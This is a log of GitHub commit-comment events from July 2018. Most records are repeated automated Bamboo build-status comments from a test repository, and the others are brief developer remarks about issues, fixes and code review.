{"id":"7966174944","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29710148,"position":null,"line":null,"path":null,"commit_id":"b743c93a2505b2b6701159344167851ea1b8b857","created_at":"2018-07-14T18:29:39Z","updated_at":"2018-07-14T18:29:39Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-14T18:29:39Z"}
{"id":"7966175818","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29710149,"position":null,"line":null,"path":null,"commit_id":"ce6ccf1e29f0ce896512a5cf4056fe06f6345589","created_at":"2018-07-14T18:30:20Z","updated_at":"2018-07-14T18:30:20Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-14T18:30:20Z"}
{"id":"7966176450","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29710153,"position":null,"line":null,"path":null,"commit_id":"8a6a92031d3bf7bc8d71b0fb7dbca764abc49fdb","created_at":"2018-07-14T18:30:51Z","updated_at":"2018-07-14T18:30:51Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-14T18:30:51Z"}
{"id":"7966177296","type":"CommitCommentEvent","actor":{"login":"smariel"},"repo":{"name":"smariel/PTree"},"payload":{"comment":{"id":29710155,"position":null,"line":null,"path":null,"commit_id":"bab0b7a6e222ce2361ee195fd20891dde173acaf","created_at":"2018-07-14T18:31:29Z","updated_at":"2018-07-14T18:31:29Z","author_association":"OWNER","body":"This correct #23 and not 24"}},"created_at":"2018-07-14T18:31:29Z"}
{"id":"7966177316","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29710156,"position":null,"line":null,"path":null,"commit_id":"d846bee7b995a60038d1ab284be4b15525c7a5fa","created_at":"2018-07-14T18:31:30Z","updated_at":"2018-07-14T18:31:30Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-14T18:31:30Z"}
{"id":"7966177904","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29710158,"position":null,"line":null,"path":null,"commit_id":"b743c93a2505b2b6701159344167851ea1b8b857","created_at":"2018-07-14T18:32:01Z","updated_at":"2018-07-14T18:32:01Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-14T18:32:01Z"}
{"id":"7966178591","type":"CommitCommentEvent","actor":{"login":"pixelzoom"},"repo":{"name":"phetsims/equality-explorer"},"payload":{"comment":{"id":29710159,"position":null,"line":null,"path":null,"commit_id":"ec89cce3c2d23925e29ca9de4f5a7960bfa583ac","created_at":"2018-07-14T18:32:34Z","updated_at":"2018-07-14T18:32:34Z","author_association":"CONTRIBUTOR","body":"#140"}},"created_at":"2018-07-14T18:32:34Z"}
{"id":"7966178671","type":"CommitCommentEvent","actor":{"login":"prashantpandey"},"repo":{"name":"splatlab/mantis"},"payload":{"comment":{"id":29710160,"position":null,"line":null,"path":null,"commit_id":"0cb106db642859d07f6d29512464b3a0dfb23fd9","created_at":"2018-07-14T18:32:38Z","updated_at":"2018-07-14T18:32:38Z","author_association":"MEMBER","body":"Running it on 200 data set."}},"created_at":"2018-07-14T18:32:38Z"}
{"id":"7966178730","type":"CommitCommentEvent","actor":{"login":"lvscar"},"repo":{"name":"Jaguar-dart/jaguar"},"payload":{"comment":{"id":29710161,"position":19,"line":245,"path":"jaguar/lib/src/http/context/context.dart","commit_id":"2282def50d4dd783ecd2fe68dc1e36fa3699fe5e","created_at":"2018-07-14T18:32:41Z","updated_at":"2018-07-14T18:32:41Z","author_association":"CONTRIBUTOR","body":"I think #103 has been fixed by this commit. 👍"}},"created_at":"2018-07-14T18:32:41Z"}
{"id":"7966178735","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29710162,"position":null,"line":null,"path":null,"commit_id":"a28f341c2ef3441af8a6b63e4e08fdb4890fc544","created_at":"2018-07-14T18:32:41Z","updated_at":"2018-07-14T18:32:41Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-14T18:32:41Z"}
{"id":"7966178737","type":"CommitCommentEvent","actor":{"login":"pixelzoom"},"repo":{"name":"phetsims/equality-explorer"},"payload":{"comment":{"id":29710163,"position":null,"line":null,"path":null,"commit_id":"41b0f5a2fdd84993676b1015632f58764ebd7763","created_at":"2018-07-14T18:32:41Z","updated_at":"2018-07-14T18:32:41Z","author_association":"CONTRIBUTOR","body":"#140"}},"created_at":"2018-07-14T18:32:41Z"}
{"id":"7966178763","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29710164,"position":null,"line":null,"path":null,"commit_id":"584f36882d0c14bf45f90dd115ba0559428ab34e","created_at":"2018-07-14T18:32:43Z","updated_at":"2018-07-14T18:32:43Z","author_association":"OWNER","body":"# Specs execution successful\r\n:scroll: [View logs](http://bamboo.comnull)\r\n### Plans updated\r\n\r\nBamboo specs have been successfully imported and the following plans have been updated.\r\n\r\nProject | Plan | Build\r\n---|---|---\r\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\r\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\r\n\r\n### Deployments updated\r\n\r\nBamboo specs have been successfully imported and the following deployment projects have been updated.\r\n\r\n|Deployment project |\r\n----|\r\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\r\n"}},"created_at":"2018-07-14T18:32:43Z"}
{"id":"7966178839","type":"CommitCommentEvent","actor":{"login":"pixelzoom"},"repo":{"name":"phetsims/equality-explorer"},"payload":{"comment":{"id":29710165,"position":null,"line":null,"path":null,"commit_id":"52a1798012bb950053184c43fade40cb204e7aa5","created_at":"2018-07-14T18:32:47Z","updated_at":"2018-07-14T18:32:47Z","author_association":"CONTRIBUTOR","body":"#140"}},"created_at":"2018-07-14T18:32:47Z"}
{"id":"7966178939","type":"CommitCommentEvent","actor":{"login":"pixelzoom"},"repo":{"name":"phetsims/equality-explorer"},"payload":{"comment":{"id":29710166,"position":null,"line":null,"path":null,"commit_id":"3330b5450cae3de89e9bbb11ea9935d66e81f314","created_at":"2018-07-14T18:32:51Z","updated_at":"2018-07-14T18:32:51Z","author_association":"CONTRIBUTOR","body":"#140"}},"created_at":"2018-07-14T18:32:51Z"}
{"id":"7966179146","type":"CommitCommentEvent","actor":{"login":"pixelzoom"},"repo":{"name":"phetsims/equality-explorer"},"payload":{"comment":{"id":29710168,"position":null,"line":null,"path":null,"commit_id":"0b8ed2f9699c869de9660e12a13f0f764dd840a0","created_at":"2018-07-14T18:32:59Z","updated_at":"2018-07-14T18:32:59Z","author_association":"CONTRIBUTOR","body":"#140"}},"created_at":"2018-07-14T18:32:59Z"}
{"id":"7966179186","type":"CommitCommentEvent","actor":{"login":"blakeembrey"},"repo":{"name":"TypeStrong/ts-node"},"payload":{"comment":{"id":29710169,"position":null,"line":null,"path":null,"commit_id":"33cb1b5faecaa652b70fe97cb3665de7d42565c2","created_at":"2018-07-14T18:33:01Z","updated_at":"2018-07-14T18:33:01Z","author_association":"MEMBER","body":"Added https://github.com/TypeStrong/ts-node#help-my-types-are-missing to README and release notes."}},"created_at":"2018-07-14T18:33:01Z"}
{"id":"7966179361","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29710170,"position":null,"line":null,"path":null,"commit_id":"15183b39c052da06bfd6ecae742e832f520324a5","created_at":"2018-07-14T18:33:10Z","updated_at":"2018-07-14T18:33:10Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-14T18:33:10Z"}
{"id":"7966180118","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29710172,"position":null,"line":null,"path":null,"commit_id":"732090f331e4882a5ab94802e599362f94afd450","created_at":"2018-07-14T18:33:52Z","updated_at":"2018-07-14T18:33:52Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-14T18:33:52Z"}
{"id":"7966180518","type":"CommitCommentEvent","actor":{"login":"rprimus"},"repo":{"name":"joaotavora/sly"},"payload":{"comment":{"id":29710173,"position":null,"line":null,"path":null,"commit_id":"ff1cd4187d801396db437f0c5e8bd15821416cf7","created_at":"2018-07-14T18:34:09Z","updated_at":"2018-07-14T18:34:09Z","author_association":"CONTRIBUTOR","body":"On Sat, Jul 14, 2018 at 10:00:52AM -0700, João Távora wrote:\n>\"Cleanup trailing whitespace\" would be slightly more useful, otherwise OK.\n\nSat 14 Jul 2018 19:24:42 BST\n\nCheers.\n\n> As an added bonus, if you are using Emacs >= 24.4 and vc-dir to\n> prepare your commits, Emacs does that for you automatically.\n\nI've read [Emacs VC](https://www.gnu.org/software/emacs/manual/html_node/emacs/Introduction-to-VC.html#Introduction-to-VC)\nand have [Change Logs](https://www.gnu.org/prep/standards/html_node/Change-Logs.html#Change-Logs) in \nthe queue.\n\nWhere can I find details of setting up Emacs to have commit messages\nimport the ChangeLog style log messages?\n\n\n-- \n-primus (Train yourself and be your own master.)\n\"First, solve the problem.  Then, write the code.\" - John Johnson\n\"Narrowness of experience leads to narrowness of imagination.\" - Rob Pike\nhttp://www.catb.org/esr/faqs/smart-questions.html\nhttp://www.chiark.greenend.org.uk/~sgtatham/bugs.html\n"}},"created_at":"2018-07-14T18:34:09Z"}
{"id":"7966180862","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29710175,"position":null,"line":null,"path":null,"commit_id":"ddd2c913a3df0b153c89c681d4ed9eab38e134f9","created_at":"2018-07-14T18:34:19Z","updated_at":"2018-07-14T18:34:19Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-14T18:34:19Z"}
{"id":"7966181727","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29710176,"position":null,"line":null,"path":null,"commit_id":"cb518f6c517d6cb8b8f8a6e1b3b80f4e963fc0b0","created_at":"2018-07-14T18:34:59Z","updated_at":"2018-07-14T18:34:59Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-14T18:34:59Z"}
{"id":"7966182412","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29710177,"position":null,"line":null,"path":null,"commit_id":"dc88147961e5f0c2302511d5313ce2f9429843cd","created_at":"2018-07-14T18:35:29Z","updated_at":"2018-07-14T18:35:29Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-14T18:35:29Z"}
{"id":"7966182516","type":"CommitCommentEvent","actor":{"login":"ShawnCZek"},"repo":{"name":"ShawnCZek/TruckersVTC"},"payload":{"comment":{"id":29710178,"position":null,"line":null,"path":null,"commit_id":"17f95a5fa937c6828c03070fe3d93aad2aa44ab3","created_at":"2018-07-14T18:35:36Z","updated_at":"2018-07-14T18:35:36Z","author_association":"OWNER","body":"I also forget to mention I changed order of employees in a company."}},"created_at":"2018-07-14T18:35:36Z"}
{"id":"7966182851","type":"CommitCommentEvent","actor":{"login":"steadicat"},"repo":{"name":"streamich/nano-css"},"payload":{"comment":{"id":29710179,"position":null,"line":null,"path":null,"commit_id":"d6f0ad58d2bf5e0204e482abe4b9b16ca7d0bc49","created_at":"2018-07-14T18:35:52Z","updated_at":"2018-07-14T18:35:52Z","author_association":"NONE","body":"I just did a quick test with a file that has 555 calls to `nano.put`. In Chrome, I got times between 38ms and 42ms, with our without `safe`. I guess there is no impact."}},"created_at":"2018-07-14T18:35:52Z"}
{"id":"7966183279","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29710180,"position":null,"line":null,"path":null,"commit_id":"e14f66d8e23120c4afd27ff771368548859a514a","created_at":"2018-07-14T18:36:11Z","updated_at":"2018-07-14T18:36:11Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-14T18:36:11Z"}
{"id":"7966183768","type":"CommitCommentEvent","actor":{"login":"ciotlosm"},"repo":{"name":"iantrich/custom-lovelace"},"payload":{"comment":{"id":29710181,"position":5,"line":55,"path":"beer-card/beer-card.js","commit_id":"f758c5057900ad89a5694d919c189b7ab38825e5","created_at":"2018-07-14T18:36:33Z","updated_at":"2018-07-14T18:36:33Z","author_association":"NONE","body":"It's better to always use ul/li and use .bullets to just add a class that enables the bullets. maybe make bullets a string to allow different bullet types."}},"created_at":"2018-07-14T18:36:33Z"}
{"id":"7966183861","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29710182,"position":null,"line":null,"path":null,"commit_id":"9ff879811f4c95e4ebf9b965c64288f1d8c62639","created_at":"2018-07-14T18:36:38Z","updated_at":"2018-07-14T18:36:38Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-14T18:36:38Z"}
{"id":"7966184291","type":"CommitCommentEvent","actor":{"login":"ciotlosm"},"repo":{"name":"iantrich/custom-lovelace"},"payload":{"comment":{"id":29710183,"position":null,"line":null,"path":null,"commit_id":"f758c5057900ad89a5694d919c189b7ab38825e5","created_at":"2018-07-14T18:37:00Z","updated_at":"2018-07-14T18:37:00Z","author_association":"NONE","body":"Better to redo the section to use a string literal to generate a varialbe and just do .innerHTML once after it's generated."}},"created_at":"2018-07-14T18:37:00Z"}
{"id":"7966184784","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29710185,"position":null,"line":null,"path":null,"commit_id":"d846bee7b995a60038d1ab284be4b15525c7a5fa","created_at":"2018-07-14T18:37:21Z","updated_at":"2018-07-14T18:37:21Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-14T18:37:21Z"}
{"id":"7966184888","type":"CommitCommentEvent","actor":{"login":"baxandrei"},"repo":{"name":"NamelessMC/Nameless"},"payload":{"comment":{"id":29710187,"position":null,"line":null,"path":null,"commit_id":"de8a8c52099f729be9a774d1c2b8b775ff97e9dd","created_at":"2018-07-14T18:37:25Z","updated_at":"2018-07-14T18:37:25Z","author_association":"CONTRIBUTOR","body":"Is a problem with my template?"}},"created_at":"2018-07-14T18:37:25Z"}
{"id":"7966185348","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29710188,"position":null,"line":null,"path":null,"commit_id":"609f0a68dd9493a8c90a4deeec0e8eca9dcb24a3","created_at":"2018-07-14T18:37:49Z","updated_at":"2018-07-14T18:37:49Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-14T18:37:49Z"}
{"id":"7966186252","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29710190,"position":null,"line":null,"path":null,"commit_id":"b743c93a2505b2b6701159344167851ea1b8b857","created_at":"2018-07-14T18:38:32Z","updated_at":"2018-07-14T18:38:32Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-14T18:38:32Z"}
{"id":"7966186790","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29710191,"position":null,"line":null,"path":null,"commit_id":"b743c93a2505b2b6701159344167851ea1b8b857","created_at":"2018-07-14T18:38:59Z","updated_at":"2018-07-14T18:38:59Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-14T18:38:59Z"}
{"id":"7966187294","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29710192,"position":null,"line":null,"path":null,"commit_id":"cb518f6c517d6cb8b8f8a6e1b3b80f4e963fc0b0","created_at":"2018-07-14T18:39:24Z","updated_at":"2018-07-14T18:39:24Z","author_association":"OWNER","body":"# Specs execution successful\r\n:scroll: [View logs](http://bamboo.comnull)\r\n### Plans updated\r\n\r\nBamboo specs have been successfully imported and the following plans have been updated.\r\n\r\nProject | Plan | Build\r\n---|---|---\r\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\r\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\r\n\r\n### Deployments updated\r\n\r\nBamboo specs have been successfully imported and the following deployment projects have been updated.\r\n\r\n|Deployment project |\r\n----|\r\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\r\n"}},"created_at":"2018-07-14T18:39:24Z"}
